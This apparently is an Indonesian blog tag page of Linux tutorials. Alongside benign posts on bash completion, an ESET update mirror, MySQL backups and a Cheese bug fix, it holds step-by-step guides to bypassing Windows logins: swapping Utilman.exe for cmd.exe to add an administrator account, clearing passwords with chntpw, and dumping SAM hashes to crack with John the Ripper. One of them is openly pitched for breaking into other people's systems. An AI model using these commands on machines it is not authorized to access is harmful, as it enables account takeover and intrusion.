Posts Tagged ‘ Linux ’

Reset Password Windows Vista/7 Menggunakan Linux

Pada tutorial kali ini kita dihadapkan dengan permasalahan lupa password Windows atau iseng² berhadiah, ingin menjebol sistem orang lain. Yang perlu disiapkan adalah Linux Backtrack (atau yang lain, yang pasti sudah bisa read/write partisi Windows). Disini kita memanfaatkan fitur Windows yang ada pada halaman login, yaitu Utilman (Utility Manager), yang dapat anda akses dengan cara menekan tombol Win+U. Maka akan muncul Utilman. Fitur inilah yang nantinya akan kita exploit/ganti menjadi command prompt. beginilah ceritanya (kayak dongeng aja.. Kekekeke…).

    • Boot Komputer target menggunakan Backtrack, masuk ke mode GUI (dapat juga dengan mode text, yang penting anda tahu letak partisi Windows target)
    • Masuk ke direktori C:\Windows\System32\ (pada komputer saya terdapat di/mnt/hda1/WINDOWS/System32) dengan mengetik :
cd /mnt/hda/WINDOWS/System32 # Masuk ke direktori System Windows
mv Utilman.exe mv Utilman_old.exe # Rename Utility Manager
cp cmd.exe Utilman.exe # Copy file Command Prompt menjadi Utility Manager
    • Setelah selesai, booting komputer ke Windows.
    • Setelah masuk Windows (halaman login), Pencet tombol Win+U, maka akan muncul halaman Command Prompt.
    • Perhatikan, Command Prompt yang anda dapatkan adalah sebagai administrator. Dari sinilah anda dapat melakukan segalanya.
    • Untuk menambahkan user dengan hak akses setara admin lakukan langkah berikut :
C:\>net user nama_user password /add
    • Contoh : saya akan menambahkan user f1dz dengan password majezty :
C:\>net user f1dz majezty /add
    • Untuk mengubah  menjadi group administrator, ketik :
C:\>net localgroup administrators f1dz /add
    • Sekarang kita sudah mempunyai account dengan hak akses setara admin, silahkan login menggunakan user tersebut.
    • Jika untuk me-reset password administrator, ketik :
C:\>net user administrator *
  • Cara tersebut juga dapat digunakan untuk me-reset password user lain, ganti “administrator” dengan user yang akan diganti passwordnya.

Semoga bermanfaat..
Terima kasih kepada offensive-security team atas inspirasinya.

Advertisements

Reset Password Windows Menggunakan chntpw di Backtrack

Ada sangat banyak cara untuk me-reset password Windows, salah satunya adalah langkah berikut. Langkah tersebut untuk mereset atau menghilangkan password pada WIndows XP. Langsung saja, Boot Backtrack anda (Bisa pake Live USB atau Live CD). Masuk ke konsole. Kita akan menggunakan tool chntpw yang terletak di /pentest/password/chntpw. Sedangkan letak password Windows di [mount point]/WINDOWS/system32/config/SAM.
Pada contoh dibawah kita akan mereset password Administrator dan “Mount point”dimisalkan terletak “/mnt/sda1”.
Lanjutkan…! Setelah buka konsole, ketik :

cd /pentest/password/
chntpw -u Administrator /mnt/sda1/Windows/System32/config/SAM

<Output dari perintah tersebut adalah>

—- User Edit Menu:
1 – Clear (blank) user password
2 – Edit (set new) user password (careful with this on XP or Vista)
3 – Promote user (make user an administrator)
4 – Unlock and enable user account [probably locked now]
q – Quit editing user, back to user select

Select: [q] > [Ketik 1]

Password cleared!

Hives that have changed:
# Name
0 </mnt/sda1/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : [Ketik y]
0 </mnt/sda1/Windows/System32/config/SAM> – OK
Selesai……..

Meng-aktifkan Autocomplete pada bash/shell/terminal di Linux (Ubuntu)

Ubuntu Terminal

Ubuntu Terminal

Fitur Autocomplete memang sangat mempermudah kita dalam menuliskan baris kode/perintah. Karena tidak mungkin kita menghafalkan semua perintah di linux atau repot jika harus membaca manualnya. Tapi dengan bantuan autocomplete kita dapat dengan mudah menggunakan perintah tersebut.

Misal perintah apt-get. Setelah kita mengetikkan apt-get, perintah apalagi yang bisa digunakan setelah itu? Kita tinggal menekan tombol tab 2 kali, kemudian akan muncul perintah berikutnya yang bisa digunakan. Pada Ubuntu (user biasa), kalau tidak salah fitur ini sudah otomatis aktif, tapi jika kita menggunakan akses setara root, fitur ini belum aktif.

Untuk mengaktifkan fitur ini, Login sebagai root, buka file /ect/bash.bashrc

Jika anda menggunakan nano, ketik perintah berikut:

nano /etc/bash.bashrc

Uncomment (hilangkan #) baris berikut:

#if [ -f /etc/bash_completion ]; then
# . /etc/bash_completion
#fi

Sehingga manjadi:

if [ -f /etc/bash_completion ]; then
 . /etc/bash_completion
fi

Simpan file (ctrl+o pada nano), kemudian tutup terminal dan cobalah 😀

Membuat Mirror Update ESET NOD32 Versi 4 di Linux (Shell/Bash)

Kedengarannya agak nyeleneh memang. Membuat mirror update Antivirus di Linux, tapi yang menggunakan update tersebut Komputer Windows (Walaupun ada juga ESET untuk Linux). Tapi memang begitulah, kadang kita membutuhkan bantuan Linux untuk membantu Windows. Pada tutorial kali ini saya akan memasang script di Webhosting. Sehingga nantinya bisa diakses oleh siapa saja. Sejauh ini saya baru menemukan 3 buah bahasa pemrograman untuk membuat update mirror ESET NOD32, yaitu : shell/bash, PHP dan Ruby. Sebenarnya kita bisa menggunakan Bahasa pemrograman apa saja untuk membuat mirror ini. Ketiga script bahasa pemrograman tersebut nantinya akan saya bahas semua nya, tapi untuk pemanasan, saya akan membahas yang menggunakan Shell terlebih dahulu.

Adapun Kelebihan dan kekurangan script ini dibandingkan dengan script PHP & Ruby adalah.

Kelebihan :

  • Langsung bisa dijalankan, hanya tinggal setting Crontab.
  • Ringan dan lebih cepat dibanding PHP dan Ruby (menurut saya ini lho), Karena trik download menggunakan WGET.
  • Hampir bisa dijalankan di semua Webhosting yang menggunakan OS Linux.
Kekurangan :
  • Belum bisa terintegrasi dengan database. (Mudah-mudahan di versi berikutnya bisa terintegrasi dengan Database, supaya mudah dalam perubahan Username dan Password).
  • Belum support notifikasi lewat Email & SMS jika update berhasil atau gagal. (Mudah-mudahan di versi berikutnya fitur ini sudah didukung, karena yang versi PHP sudah saya tambahkan kedua fitur ini).
  • Hanya jalan di Linux (Lha wong judulnya juga bikin di Linux :D). Tapi versi PHP dan Ruby bisa jalan di Windows.
  • Belum bisa cek Expired Date Username. (di versi PHP sudah saya tambahkan fitur ini).
Okey, sekarang hal-hal yang perlu disiapkan atau dibutuhkan.
  • Langganan Webhosting dengan Bandwidth Unlimited dan OS Linux (tentunya) atau bisa di coba di PC Linux.
  • Jika dipasang di Webhosting, Free Space di Webhosting minimal 200MB (Karena kita akan Download semua module update dan semua versi termasuk Business Edition 32 & 64 bit, Smart Security 32 & 64 bit dan support bahasa).
  • Sedikit pengetahuan tentang programming, Linux dan cPanel.
  • Jika menggunakan Webhosting, sebaiknya menggunakan cPanel.
  • Download aplikasi unrar. Nanti akan digunakan untuk melakukan ekstrak file update.ver.
Kita mulai dengan download scriptnya di bagian bawah dan jangan lupa download juga aplikasi unrar, kemudian ekstrak kedu file tersebut. Langkah demi langkah yang saya lakukan untuk memasang script adalah sebagai berikut :
  • Buat direktori baru di /home/nama_user. Beri nama direktori tersebut dengan nama “bin”, sehingga nanti akan muncul direktori
/home/nama_user/bin.
  • Upload file nodupdate.sh dan unrar ke direktori /home/nama_user/bin.
  • Lakukan chmod/permission kepada kedua file tersebut menjadi 755 lewat file manager.
  • Buat direktori baru lagi di /home/nama_user/public_html. Beri nama direktori tersebut dengan nama “nod_upd”, sehingga akan ada direktori baru, yaitu
/home/nama_user/public_html/nod_upd.
  • Buatlah Crontab/Cron Job sesuai dengan kebutuhan anda. (Saya menggunakan interval eksekusi setiap 30 menit). Pada saat debugging, mungkin pada awalnya kita bisa mengeset sesuai keinginan kita.

Cron Job

  • Cek apakah file update sudah terbentuk di :
/home/nama_user/public_html/download

  • Jika masih gagal, cek Log file. Disitu ada keterangan kenapa gagal. Log file ini saya taruh di
/home/nama_user/tmp/nodsh.log.

Jangan lupa ganti yuor_name atau nama_user dengan nama yang digunakan untuk login di cPanel, dengan Hasil dari tutorial ini bisa anda lihat pada website http://smart-ics.com/nod_upd. Anda bisa mencoba untuk melakukan update ESET anda ke link tersebut (mumpung masih saya open :D).

File-file yang di butuhkan (download) :
   – Bug fixed, Penambahan parameter (-y) pada saat ekstrak.
Script diatas saya peroleh dari forum http://ashus.ashus.net/viewtopic.php?f=16&t=68 dengan beberapa perubahan sesuai dengan kebutuhan saya. Anda juga diperkenankan untuk mengubahnya sendiri sesuai dengan keinginan anda.
Terima kasih banyak saya ucapkan kepada saudara Ashus yang telah memberi banyak inspirasi 😀

Cracking Password Windows 7

Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.

Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.

Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.

Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :

root@root: ~#

Kemudian ketik :

root@root: ~# startx

Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.

root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk

sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:

root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt

File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.

root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7

Cracking Password Win7

Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.

Cracking Password Win7 Tanpa Parameter Charset

Cracking Password Win7 Tanpa Parameter Charset

Tanpa charset alnum:

root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt

Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.

Script Auto Backup Database MySQL pada cPanel

Kemarin sempat browsing cara backup database MySQL lewat Cron Jobs yang tersedia pada linux dan disediakan juga di cPanel. Ternyata langkah yang harus dilakukan tidak terlalu sulit. Bisa langsung menggunakan perintah yang langsung di tulis di Cron Jobs atau dengan cara membuat script. Script yang saya buat disini menggunakan Shell/Bash.

Oke langsung saja.

    1. Terlebih dahulu sebuah buatlah folder backup pada user yg bersangkutan
    2. Kemudian buatlah script untuk backup database MySQL. Disini saya tuliskan script lengkap yang telah saya buat dan nanti akan saya jelaskan satu persatu.
#!/bin/sh
tanggal=`date '+%Y%m%d_%H%M%S'`;
path="/home/user/backup";
find $path/ -mtime +2 -type f -exec rm -rf {} \;
sleep 30;
mysqldump -u userdb -ppassdb namadb | gzip > $path/namadb_$tanggal.gz
    1. Simpan script tersebut dan berilah nama backup.sh
    2. Upload dan letakkan file tersebut pada direktori /bin pada cPanel.
    3. Ubah permission nya menjadi 755.
    4. Masuk ke Cron Jobs, pada menu Add New Cron Job, kemudian setting waktu yang diinginkan untuk melakukan backup.
    5. Pada form Command, masukkan perintah
sh /home/user/bin/backup.sh
  1. Klik tombol “Add New Cron Job”.
  2. Untuk mencoba apakah script yang kita buat berjalan atau tidak, sebaiknya setting waktu waktu eksekusi di Cron Jobs tadi menjadi “Every Minute”, nanti jika script nya sudah berjalan dengan lancar baru ubah lagi sesuai dengan yang diinginkan.

Penjelasan Script

tanggal=`date '+%Y%m%d_%H%M%S'`;

Adalah variabel yang mengambil tanggal pada waktu script di eksekusi, sehingga nama database akan selalu berbeda, sesuai dengan tanggal dan jam backup.

path="/home/user/backup";

Folder dimana database hasil backup akan di simpan.

find $path/ -mtime +2 -type f -exec rm -rf {} \;

Script diatas berfungsi untuk mencari file di dalam folder $path (/home/user/backup) yang mempunyai umur lebih dari 2 hari dari sekarang. Jika file yang dimaksud ditemukan, kemudian file tersebut di delete. Silahkan ubah +2 sesuai dengan kebutuhan anda.

sleep 30;

Digunakan untuk menunggu waktu delete dan waktu backup, supaya tidak berbarengan. 30 adalah dalam detik. Mungkin script ini tidak diperlukan jika database yang didelete kecil atau sedikit. Tapi jika database yang akan didelete besar dan banyak, sebaiknya script ini ditambahkan supaya tidak terlalu memberatkan server.

mysqldump -u userdb -ppassdb namadb | gzip > $path/namadb_$tanggal.gz

mysqldump adalah perintah untuk melakukan backup pada database MySQL. Gantilah userdb, passdb dan namadb sesuai dengan user, password dan database anda. gzip digunakan untuk melakukan kompresi database. Anda juga diperbolehkan untu menggunakan jenis kompresi lain seperti zip, rar dll.

Semoga bermanfaat.

Permasalahan pada Cheese (Aplikasi Untuk mengambil foto dan Video)

Permasalahan.
Pada saat mengambil gambar, menggunakan mouse atau spasi, setelah proses capture layar akan menjadi putih (blank, white screen). Ini merupakan bugs yang menjengkelkan. Setelah Searching kesana kemari akhirnya dapet di https://bugs.launchpad.net/ubuntu/+source/cheese/+bug/297890.

Perbaikan.
Buka file berikut :

/home/username/.gconf/desktop/gnome/interface/%gconf.xml

Masukkan kode berikut :

<entry name="accessibility" mtime="1225138994" type="bool" value="true"/>

Setelah <gconf>.

Save file tersebut dan coba jalankan cheese.
Mudah-mudahan berhasil.

%d bloggers like this: